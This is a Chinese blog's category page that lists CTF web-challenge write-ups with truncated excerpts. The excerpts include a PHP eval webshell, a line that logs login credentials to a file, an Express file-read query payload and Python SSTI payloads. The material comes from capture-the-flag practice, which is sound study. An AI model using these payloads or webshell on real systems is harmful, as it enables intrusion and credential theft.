随笔分类 - Writeup
网信柏鹭杯2023 wp
摘要:express fs ?file[href]=a&file[origin]=1&file[protocol]=file:&file[hostname]=&file[pathname]=/home/node/fl%2561g.txt 综合题5、6、7 spring heapdump泄露信息 sun.j
miniL ctf2023 WP
摘要:Signin shell.php查看源码 <?php error_reporting(0); show_source(__FILE__); $a = $_GET["a"]; $b = $_GET["b"]; $c = $_GET["c"]; $d = $_GET["d"]; $e = $_GET["
NKCTF day1 Web wp
摘要:baby_php <?php error_reporting(0); class Welcome{ public $name; public $arg = 'oww!man!!'; public function __construct(){ $this->name = 'ItS SO CREAZY
FinalHgame wp
摘要:ssti 常规的ssti php-blog admin 12345 进入后台,发一篇文章, 内容填<?php eval($_POST['pass']); 直接getshell 然后在login.php里面加一句 file_put_contents('login.txt',$username." ".
HSCSEC CTF 2023部分WP
摘要:EZSSTI ?name={{''.__class__.__mro__[-1].__subclasses__()}} 查看所有子类 from requests import * for i in range(300): url="http://4dcc7f0f-0e07-49e1-b2c8-b9ce
HGAME2023部分WP
摘要:Search Commodity 爆破密码admin123 登录进去, Designer app.post("/button/share", auth, async (req, res) => { const browser = await puppeteer.launch({ headless:
